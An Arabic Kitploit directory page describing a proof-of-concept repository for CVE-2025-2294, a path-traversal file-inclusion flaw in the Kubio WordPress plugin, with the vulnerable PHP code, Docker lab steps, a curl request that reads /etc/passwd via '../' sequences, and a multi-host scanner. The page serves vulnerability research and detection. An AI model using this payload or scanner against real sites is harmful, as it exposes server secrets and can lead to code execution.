Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-2294 — إثبات مفهوم لاستغلال CVE-2025-2294، وهي ثغرة LFI حرجة في أداة بناء الصفحات Kubio AI Page Builder لووردبريس. يتضمن ماسحًا بلغة بايثون، قالب nuclei، ومختبر Docker للاختبار. | Kitploit
أدوات/GitHubGitHub/iteride/cve-2025-2294
ماسحات الثغرات الأمنية للويبتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubiteride/cve-2025-2294

CVE-2025-2294

إثبات مفهوم لاستغلال CVE-2025-2294، وهي ثغرة LFI حرجة في أداة بناء الصفحات Kubio AI Page Builder لووردبريس. يتضمن ماسحًا بلغة بايثون، قالب nuclei، ومختبر Docker للاختبار.

عرض المستودع
منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-2294

مقدمة

CVE-2025-2294 — ثغرة أمنية خطيرة من نوع Local File Inclusion (LFI) في إضافة Kubio AI Page Builder لووردبريس. تسمح الثغرة لمهاجم عن بُعد غير مصادق بتمرير معامل مخصص، مما يؤدي إلى تضمين ملف عشوائي على الخادم عبر الإضافة؛ إذا كان الملف المضمن هو PHP، فقد يؤدي ذلك إلى تنفيذ كود عن بُعد (RCE).

  • الإصدارات المتأثرة: جميع إصدارات الإضافة 2.5.1 ≥.
  • CVSS v3.1: 9.8 (حرجة).

هدف التقرير

  1. تنظيم المواد المتاحة وشرح جوهر الثغرة.
  2. مناقشة الظروف والإعدادات التي تكون فيها الثغرة ذات صلة.
  3. عرض طرق الكشف والتوصيات للحماية (بدون PoC خطوة بخطوة).
  4. تقديم توصيات للإصلاح وتخفيف الأثر.

CPE / التحديد

  • معرف الإضافة: kubio
  • المسار: /wp-content/plugins/kubio/
  • البائع: ExtendThemes / Kubio
  • CPE (مثال): cpe:2.3:a:extendthemes:kubio_ai_page_builder::::::wordpress::*

CWE: CWE-22 — تقييد غير صحيح لاسم المسار إلى دليل مقيد (اجتياز المسار).


شروط الاستغلال

  • تم تثبيت وتفعيل إضافة Kubio على الموقع.
  • الإصدار 2.5.1 ≥ (غير مصحح).
  • نقطة نهاية HTTP(S) عامة متاحة تقبل المعامل __kubio-site-edit-iframe-classic-template.
  • (للحصول على RCE) يجب أن يوجد ملف PHP قابل للتضمين أو مسار آخر لرمز قابل للتنفيذ في النظام (مثلًا، عبر ثغرات في مكونات أخرى أو أذونات خاطئة).

التأثير

  • قراءة ملفات تحتوي على أسرار (مثل wp-config.php، مفاتيح خاصة، سجلات).
  • إمكانية تحميل/تنفيذ كود عشوائي، تعديل المحتوى أو زرع أبواب خلفية.
  • اختراق الخادم، احتمال تعطل الموقع، حذف/تشفير البيانات.
  • يتسع نطاق المخاطر بسبب انتشار الإضافة الواسع وظهور PoC/ماسحات ضوئية عامة.

التفاصيل الفنية

الكود الضعيف مرتبط بالدالة kubio_hybrid_theme_load_template()، التي تصل إلى المصفوفة العامة $_REQUEST:

root@kitploit:~
$template_id = Arr::get($_REQUEST, '__kubio-site-edit-iframe-classic-template', false);
if ($template_id) {
    $new_template = locate_template([$template_id]);
    if ($new_template !== '') {
        return $new_template;
    }
}

ما يفعله الكود:

  1. Arr::get($_REQUEST, '__kubio-site-edit-iframe-classic-template', false) — يأخذ القيمة مباشرة من مجموعة المدخلات العامة ($_REQUEST تدمج $_GET و $_POST و $_COOKIE). وهذا يعني أن المعامل يمكن التحكم به عن بُعد.
  2. إذا كان المعامل موجودًا ($template_id صحيح)، يستدعي الكود locate_template([$template_id]).
  3. locate_template() — أداة WordPress (أو ما يعادلها في الإضافة) للبحث عن القوالب بناءً على المسار/الاسم النسبي المُرسَل. في السيناريو الطبيعي، كان من المتوقع أن تُمرر أسماء ملفات داخل دليل قوالب آمن، مثل header.php أو template-parts/content.php.
  4. ثم يتم استخدام القيمة المرتجعة ($new_template) — في التنفيذ الأصلي، قد يؤدي ذلك إلى تضمين/استدعاء المسار الذي تم العثور عليه، أو تمرير هذا المسار لعرضه. وهذا يخلق إمكانية LFI: يمكن للمهاجم تحديد مسار إلى ملف عشوائي.

التشغيل المحلي

root@kitploit:~
git clone https://github.com/iteride/CVE-2025-2294.git && cd CVE-2025-2294/ && docker-compose up -d
  • ندخل إلى Docker:
root@kitploit:~
docker exec -it <WORDPRESS_DOCKER_ID> bash
  • نقوم بتنزيل وتشغيل kubio

للتشغيل بعد فك الضغط، انتقل إلى http://localhost:8080/wp-admin/plugins.php وقم بتفعيل الإضافة

root@kitploit:~
cd /var/www/html/wp-content/plugins
curl -L -o kubio-2.5.1.zip "https://downloads.wordpress.org/plugin/kubio.2.5.1.zip"
unzip kubio-2.5.1.zip
rm kubio-2.5.1.zip
chown -R www-data:www-data kubio

POC/Exploit

root@kitploit:~
curl 'http://localhost:8080/?__kubio-site-edit-iframe-preview=1&__kubio-site-edit-iframe-classic-template=../../../../../../../../../etc/passwd'

lfi

__kubio-site-edit-iframe-classic-template=<path>

يقوم هذا المعامل بتمرير سلسلة نصية تستخدمها الإضافة كمعرف/مسار للقالب.

في المقطع الضعيف من الكود، تؤخذ القيمة من $_REQUEST وتُمرر إلى locate_template() بدون تطبيع أو تقييد مسبق. ونتيجة لذلك، يصبح اجتياز المسار (path traversal) ممكنًا: إذا تم إدراج تسلسلات ../ في القيمة، فقد يتجاوز المسار الناتج دليل القوالب المتوقع ويشير إلى أي ملف في نظام الملفات (بما في ذلك /etc/passwd).

هذا المعامل بالتحديد يحمل العبء الضار للهجوم — فبواسطته يحدد المهاجم الملف المستهدف.

__kubio-site-edit-iframe-preview=1

هذا علامة خدمية (وضع المعاينة / وضع تحرير iframe). تقوم بتحويل معالجة الطلب إلى الفرع البرمجي الذي يتم فيه قراءة واستخدام القالب المحدد في __kubio-site-edit-iframe-classic-template.

بدون preview=1 قد لا تعالج الإضافة المعامل classic-template أو تستخدم منطقًا آخر؛ مع preview=1 يتم تفعيل المنطق الذي يسمح بقراءة وإرجاع القالب، مما يجعل الاستغلال ممكنًا.


nuclei-template

1. القالب السلبي

  • يتحقق من إصدار الإضافة عبر الملف /wp-content/plugins/kubio/readme.txt.

passive

2. القالب النشط

  • يتحقق من مخرجات /etc/passwd

active


السكربت

يقوم السكربت بفحص مخرجات /etc/passwd ولكنه أسرع بعدة مرات من nuclei بفضل تعدد الخيوط، كما يدعم مسح عدة مضيفين في وقت واحد.

root@kitploit:~
python3 scan.py --target http://localhost:8080

scan

تنزيل الأداة